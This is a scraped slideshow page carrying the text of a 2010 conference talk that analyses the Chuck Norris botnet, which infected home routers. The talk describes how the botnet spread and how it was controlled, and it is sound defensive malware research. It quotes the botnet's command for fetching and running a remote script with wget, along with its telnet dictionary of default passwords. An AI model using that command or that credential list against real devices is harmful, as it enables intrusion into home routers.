embedded malware an analysis of the chuck norris botnet
play

Embedded Malware An Analysis of the Chuck Norris Botnet P. eleda, - PowerPoint PPT Presentation

Jul 18, 2023 •175 likes •691 views

Embedded Malware An Analysis of the Chuck Norris Botnet P. eleda, R. Krej, J. Vykopal, M. Draar {celeda|vykopal|drasar}@ics.muni.cz, radek.krejci@mail.muni.cz The sixth European Conference on Computer Network Defense EC2ND

  1. Embedded Malware – An Analysis of the Chuck Norris Botnet P. Čeleda, R. Krejčí, J. Vykopal, M. Drašar {celeda|vykopal|drasar}@ics.muni.cz, radek.krejci@mail.muni.cz The sixth European Conference on Computer Network Defense – EC2ND 28-29 October 2010, Berlin, Germany

  2. Part I Botnet Discovery P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 2 / 22

  3. Motivation – What is happening in our network? LAN LAN LAN Internet LAN LAN P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 3 / 22

  4. Motivation – What is happening in our network? LAN LAN LAN Internet Firewall LAN LAN P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 3 / 22

  5. Motivation – What is happening in our network? LAN LAN LAN Internet Firewall LAN LAN AV protection P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 3 / 22

  6. Motivation – What is happening in our network? LAN LAN But what is happening here? LAN Internet Firewall LAN LAN AV protection P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 3 / 22

  7. (In)visible Embedded Malware Client-side anti-* protection is used and well known. Internet P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 4 / 22

  8. (In)visible Embedded Malware Client-side anti-* protection is used and well known. What could happen if we attack infrastructure ? Chuck Norris Botnet Attack Internet Internet P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 4 / 22

  9. Network Security Monitoring at Masaryk University FlowMon probe FlowMon probe FlowMon probe NetFlow data generation P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 5 / 22

  10. Network Security Monitoring at Masaryk University FlowMon probe NetFlow v5/v9 FlowMon probe NetFlow collector FlowMon probe NetFlow data NetFlow data generation collection P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 5 / 22

  11. Network Security Monitoring at Masaryk University FlowMon SPAM probe detection NetFlow worm/virus v5/v9 detection FlowMon probe NetFlow intrusion collector detection FlowMon probe NetFlow data NetFlow data NetFlow data generation collection analyses P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 5 / 22

  12. Network Security Monitoring at Masaryk University http WWW FlowMon SPAM probe detection NetFlow worm/virus v5/v9 mail detection FlowMon mailbox probe NetFlow intrusion collector syslog detection FlowMon syslog probe server NetFlow data NetFlow data NetFlow data incident generation collection analyses reporting P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 5 / 22

  13. Botnet Discovery Worldwide TELNET scan attempts. Mostly comming from ADSL connections. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 6 / 22

  14. Part II Chuck Norris Botnet P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 7 / 22

  15. Chuck Norris Botnet in a Nutshell Linux malware – IRC bots with central C&C servers. Attacks poorly-configured Linux MIPSEL devices. Vulnerable devices – ADSL modems and routers . Uses TELNET brute force attack as infection vector. Users are not aware about the malicious activities. Missing anti-malware solution to detect it. Discovered at Masaryk University on 2 December 2009. The malware got the Chuck Norris moniker from a comment in its source code [R]anger Killato : in nome di Chuck Norris ! P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 8 / 22

  16. Monitoring of the Botnet Botnet infiltration used from 12/2009 to 02/2010. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 9 / 22

  17. Monitoring of the Botnet IRC server bad guy Botnet infiltration used from 12/2009 to 02/2010. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 9 / 22

  18. Monitoring of the Botnet IRC server bad guy bots Botnet infiltration used from 12/2009 to 02/2010. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 9 / 22

  19. Monitoring of the Botnet IRC server bad guy bots WAN port ASUS WL-500gP (agent-provocateur) Botnet infiltration used from 12/2009 to 02/2010. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 9 / 22

  20. Monitoring of the Botnet IRC server bad guy bots TAP WAN port FlowMon, CSIRT-MU tcpdump ASUS WL-500gP (agent-provocateur) Botnet infiltration used from 12/2009 to 02/2010. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 9 / 22

  21. Botnet Searching for Vulnerable Devices infected device P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 10 / 22

  22. Botnet Searching for Vulnerable Devices list of C class networks to scan 85.174. 203.223. ... 217.236. 222.215. ... 88.253. ... infected device 201.1. 200.121. 58.6. ... 220.240. ... IP Range Owner IP Range Owner 217.236.0.0/16 Deutsche Telekom 88.253.0.0/16 TurkTelekom 87.22.0.0/16 Telecom Italia 220.240.0.0/16 Comindico Australia 85.174.0.0/16 Volgograd Electro Svyaz 222.215.0.0/16 China Telecom 201.1.0.0/16 Telecomunicacoes de Sao Paulo 200.121.0.0/16 Telefonica del Peru Table 1: Example of botnet propagation targets. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 10 / 22

  23. Botnet Searching for Vulnerable Devices list of C class networks to scan pnscan 85.174. (port 23) 203.223. ... 217.236. 222.215. ... 88.253. ... infected device 201.1. 200.121. 58.6. ... 220.240. ... IP Range Owner IP Range Owner 217.236.0.0/16 Deutsche Telekom 88.253.0.0/16 TurkTelekom 87.22.0.0/16 Telecom Italia 220.240.0.0/16 Comindico Australia 85.174.0.0/16 Volgograd Electro Svyaz 222.215.0.0/16 China Telecom 201.1.0.0/16 Telecomunicacoes de Sao Paulo 200.121.0.0/16 Telefonica del Peru Table 1: Example of botnet propagation targets. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 10 / 22

  24. Botnet Searching for Vulnerable Devices list of C class networks to scan pnscan 85.174. (port 23) 203.223. ... 217.236. 222.215. ... 88.253. ... infected device 201.1. 200.121. 58.6. ... 220.240. ... list of possible victims IP Range Owner IP Range Owner 217.236.0.0/16 Deutsche Telekom 88.253.0.0/16 TurkTelekom 87.22.0.0/16 Telecom Italia 220.240.0.0/16 Comindico Australia 85.174.0.0/16 Volgograd Electro Svyaz 222.215.0.0/16 China Telecom 201.1.0.0/16 Telecomunicacoes de Sao Paulo 200.121.0.0/16 Telefonica del Peru Table 1: Example of botnet propagation targets. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 10 / 22

  25. Infection of a Vulnerable Device infected victim device P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 11 / 22

  26. Infection of a Vulnerable Device TELNET service dictionary attack infected victim device User Password admin, Admin, password, root, 1234, private, XA1bac0MX, root adsl1234, %%fuckinside%%, dreambox, blank password admin admin, password, blank password 1234 1234Admin Table 2: Passwords used for a dictionary attack. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 11 / 22

  27. Infection of a Vulnerable Device TELNET service download current bot version dictionary attack infected victim web device server User Password admin, Admin, password, root, 1234, private, XA1bac0MX, root adsl1234, %%fuckinside%%, dreambox, blank password admin admin, password, blank password 1234 1234Admin Table 2: Passwords used for a dictionary attack. P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 11 / 22

  28. Bot Initialization and Further Propagation bot STOP deny remote access (ports 22-80) infected device P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 12 / 22

  29. Bot Initialization and Further Propagation 1. join ##soldiers## C&C bot (IRC) STOP deny remote access server (ports 22-80) infected device P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 12 / 22

  30. Bot Initialization and Further Propagation 1. join ##soldiers## C&C bot (IRC) STOP deny remote access server 2. Topic: !* init-cmd (ports 22-80) (get scan-tools) infected device Initial Command (IRC Topic): :!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 12 / 22

  31. Bot Initialization and Further Propagation 1. join ##soldiers## C&C bot (IRC) STOP deny remote access server 2. Topic: !* init-cmd (ports 22-80) (get scan-tools) infected device Initial Command (IRC Topic): :!* sh wget http://87.98.163.86/pwn/scan.sh;chmod u+x scan.sh;./scan.sh P. Čeleda et al. Embedded Malware – An Analysis of the Chuck Norris Botnet 12 / 22

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

A Moose Once Bit My Honeypot A Story of an Embedded Linux Botnet by Olivier Bilodeau (

A Moose Once Bit My Honeypot A Story of an Embedded Linux Botnet by Olivier Bilodeau (

A Moose Once Bit My Honeypot A Story of an Embedded Linux Botnet by Olivier Bilodeau ( @obilodeau ) $ apropos Embedded Linux Malware Moose DNA (description) Moose Herding (the Operation) Whats New? Take Aways $ whoami Malware

1.19k views • 97 slides
Botnets Leonidas Stylianou CS 682 23/04/2020 Lifecycle of a bot Infected host Botnet malware

Botnets Leonidas Stylianou CS 682 23/04/2020 Lifecycle of a bot Infected host Botnet malware

Botnets Leonidas Stylianou CS 682 23/04/2020 Lifecycle of a bot Infected host Botnet malware Botmaster controls becomes a bot and infects a host. the botnet. joins the botnet . Coordination of f bots with C&C server Bots query the

1k views • 58 slides
Detecting Botnets with NetFlow V. Krmek, T. Plesnk {vojtec|plesnik}@ics.muni.cz FloCon

Detecting Botnets with NetFlow V. Krmek, T. Plesnk {vojtec|plesnik}@ics.muni.cz FloCon

Detecting Botnets with NetFlow V. Krmek, T. Plesnk {vojtec|plesnik}@ics.muni.cz FloCon 2011, January 12, Salt Lake City, Utah Presentation Outline NetFlow Monitoring at MU Chuck Norris Botnet in a Nutshell Botnet Detection Methods

906 views • 63 slides
Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis Paul Royal

Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis Paul Royal

Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis Paul Royal paul@gtisc.gatech.edu Agenda Modern Malware Obfuscations, Server-side Polymorphism, Collection Volume Malware Analysis Detection

504 views • 27 slides
GOODWARE DRUGS FOR MALWARE: ON-THE-FLY MALWARE ANALYSIS AND CONTAINMENT DAMIANO BOLZONI

GOODWARE DRUGS FOR MALWARE: ON-THE-FLY MALWARE ANALYSIS AND CONTAINMENT DAMIANO BOLZONI

GOODWARE DRUGS FOR MALWARE: ON-THE-FLY MALWARE ANALYSIS AND CONTAINMENT DAMIANO BOLZONI CHRISTIAAN SCHADE TWENTE SECURITY LAB UNIVERSITY OF TWENTE THE NETHERLANDS AGENDA Something about malware Malware internals Current analysis

398 views • 27 slides
Android Malware Analysis on Attacks and Defense Android malware Android malware With the

Android Malware Analysis on Attacks and Defense Android malware Android malware With the

Android Malware Analysis on Attacks and Defense Android malware Android malware With the explosive growth of mobile device market and usage, there is an increasing number of malicious mobile applications targeting these devices and

819 views • 44 slides
PIN-point control for analyzing malware Jason Jones REcon 2014 1 Me Sr

PIN-point control for analyzing malware Jason Jones REcon 2014 1 Me Sr

PIN-point control for analyzing malware Jason Jones REcon 2014 1 Me Sr Sec Research Analyst @ Arbor ex-TippingPoint ASI Primarily reverse malware Interests / Research DDoS Botnet tracking Malware Clustering Bug

419 views • 29 slides
MetaNet A botnet with Metasploit integration By : Matan Ramrazker, Guy Gelber What is a Botnet

MetaNet A botnet with Metasploit integration By : Matan Ramrazker, Guy Gelber What is a Botnet

MetaNet A botnet with Metasploit integration By : Matan Ramrazker, Guy Gelber What is a Botnet A Botnet is a software that is designed to perform simple automated and usually cyclical operations. Botnet management is performed remotely

507 views • 24 slides
Getting started with malware analysis Judith van Stegeren Definitions Malware : any software that

Getting started with malware analysis Judith van Stegeren Definitions Malware : any software that

Getting started with malware analysis Judith van Stegeren Definitions Malware : any software that does something that causes harm to a user, computer or network, including viruses, trojan horses, worms, rootkits, scareware and spyware. Malware

119 views • 9 slides
An Open Botnet Analysis Framework for An Open Botnet Analysis Framework for Automatic Tracking

An Open Botnet Analysis Framework for An Open Botnet Analysis Framework for Automatic Tracking

An Open Botnet Analysis Framework for An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization Automatic Tracking and Activity Visualization marco riccardi Italian Chapter - The Honeynet Project marco cremonini

393 views • 36 slides
A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND

A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND

A CUCKOOS EGG IN THE MALWARE NEST ON-THE-FLY SIGNATURE-LESS MALWARE ANALYSIS, DETECTION AND CONTAINMENT FOR LARGE NETWORKS CHRISTIAAN SCHADE TWENTE SECURITY LAB UNIVERSITY OF TWENTE THE NETHERLANDS MALWARE WARS In the last

313 views • 14 slides
. Linux/Moose endangered or extinct? An update on this atypical embedded Linux botnet by

. Linux/Moose endangered or extinct? An update on this atypical embedded Linux botnet by

. Linux/Moose endangered or extinct? An update on this atypical embedded Linux botnet by Olivier Bilodeau $ apropos Statically linked stripped ELF challenges Moose DNA (description) Moose Herding (the Operation) A Strange Animal Latest

727 views • 55 slides
Impeding Automated Malware Analysis with Environment-sensitive Malware Chengyu Song , Paul Royal

Impeding Automated Malware Analysis with Environment-sensitive Malware Chengyu Song , Paul Royal

Impeding Automated Malware Analysis with Environment-sensitive Malware Chengyu Song , Paul Royal and Wenke Lee College of Computing Georgia Institute of Technology Agenda l Background l Defeating Automated Malware Analysis Host

1.28k views • 28 slides
CS7038 - Malware Analysis - Wk07.2 Malware Research Online Coleman Kane kaneca@mail.uc.edu

CS7038 - Malware Analysis - Wk07.2 Malware Research Online Coleman Kane kaneca@mail.uc.edu

CS7038 - Malware Analysis - Wk07.2 Malware Research Online Coleman Kane kaneca@mail.uc.edu February 22, 2018 Exploring the Online Ecosystem One nice aspect of malware analysis is that, since much of it originates online and

119 views • 10 slides
Threat analysis of a Cellular Botnet regarding DoS attacks (Bedrohungsanalyse von

Threat analysis of a Cellular Botnet regarding DoS attacks (Bedrohungsanalyse von

Lehrstuhl fr Netzarchitekturen und Netzdienste Institut fr Informatik Technische Universitt Mnchen Threat analysis of a Cellular Botnet regarding DoS attacks (Bedrohungsanalyse von Mobilfunk-Botnetzen im Hinblick auf DoS-Angriffe)

311 views • 20 slides
CS7038 - Malware Analysis - Wk03.1 Malware Taxonomy and Terminology Coleman Kane

CS7038 - Malware Analysis - Wk03.1 Malware Taxonomy and Terminology Coleman Kane

CS7038 - Malware Analysis - Wk03.1 Malware Taxonomy and Terminology Coleman Kane kaneca@mail.uc.edu January 24, 2017 Why Classification is Important Malware classification helps us in multiple ways. Here are a couple key ways:

787 views • 16 slides
Flux Power Holdings, Inc. Advanced Lithium-ion Battery Technology ROTH Conference March 17-19

Flux Power Holdings, Inc. Advanced Lithium-ion Battery Technology ROTH Conference March 17-19

Flux Power Holdings, Inc. Advanced Lithium-ion Battery Technology ROTH Conference March 17-19 2019 OTC: FLUX Safe Harbor Language Forward Looking Statements: This presentation contains forward-looking statements. All statements other than

350 views • 20 slides
Big Data - Changing Corporate Culture Dr. Chuck Brooks Introduction While investment in big

Big Data - Changing Corporate Culture Dr. Chuck Brooks Introduction While investment in big

Big Data - Changing Corporate Culture Dr. Chuck Brooks Introduction While investment in big data is growing ( expected to exceed $41 billion by 2018 according to market research firm IDC) we are seeing a growing belief among organizations

543 views • 12 slides
G C Goodnight Consulting, Inc. 8418 Hunt Valley Drive, Suite 200 Vienna, Virginia 22182 Voice:

G C Goodnight Consulting, Inc. 8418 Hunt Valley Drive, Suite 200 Vienna, Virginia 22182 Voice:

Life Cycle Planning For Nuclear Program Staffing A Presentation To Charles T. (Chuck) Goodnight G C Goodnight Consulting, Inc. 8418 Hunt Valley Drive, Suite 200 Vienna, Virginia 22182 Voice: (703) 448-6820 Fax: (703) 448-8443 Voice:

588 views • 24 slides
WOOD, GIVEN HIS EDUCATION, TRAINING AND EXPERIENCE? Brice Salence, Pedrie le Roux SCOR 1.

WOOD, GIVEN HIS EDUCATION, TRAINING AND EXPERIENCE? Brice Salence, Pedrie le Roux SCOR 1.

HOW MUCH WOOD WOULD A WOODCHUCK CHUCK, IF A WOODCHUCK COULD BE REASONABLY EXPECTED TO CHUCK WOOD, GIVEN HIS EDUCATION, TRAINING AND EXPERIENCE? Brice Salence, Pedrie le Roux SCOR 1. INTRODUCTION-CASE STUDY ONE 46 year-old saleslady, repeated

759 views • 42 slides
National Forum Re-entry and Recidivism Washington D.C. Forum Goals Set specific goals to

National Forum Re-entry and Recidivism Washington D.C. Forum Goals Set specific goals to

Together Toward Tomorrow Collaborating Today for Justice and Mental Health Re-Entry Charles L. Ryan, Director October 10, 2012 1 National Forum Re-entry and Recidivism Washington D.C. Forum Goals Set specific goals to reduce

352 views • 24 slides
Monthly Meeting April 26, 2017 Central Maryland Chapter Sponsors: Bay Dynamics, Clearswift,

Monthly Meeting April 26, 2017 Central Maryland Chapter Sponsors: Bay Dynamics, Clearswift,

Monthly Meeting April 26, 2017 Central Maryland Chapter Sponsors: Bay Dynamics, Clearswift, LogRhythm, Logical Operations Parsons Cyber, Phoenix TS, Red Owl Analytics, Tenable Network Security, Vencore Agenda / Announcements Welcome to

386 views • 22 slides
Project Plan HR Matters The Capstone Experience Team Urban Science Brandon Sartele Kenny

Project Plan HR Matters The Capstone Experience Team Urban Science Brandon Sartele Kenny

Project Plan HR Matters The Capstone Experience Team Urban Science Brandon Sartele Kenny Massie Jenna Cyrocki Mike Nelson Ben Blazy Department of Computer Science and Engineering Michigan State University Fall 2014 From Students to

560 views • 16 slides
Transit (BRT) Planning Study Public Meeting 2: Preliminary Alternatives Madison Senior Center |

Transit (BRT) Planning Study Public Meeting 2: Preliminary Alternatives Madison Senior Center |

Madison East-West Bus Rapid Transit (BRT) Planning Study Public Meeting 2: Preliminary Alternatives Madison Senior Center | May 14, 2019 | 6:00-7:30 PM INTRODUCTIONS + AGENDA City Staff City of Madison Tom Lynch, Director of

755 views • 56 slides

More recommend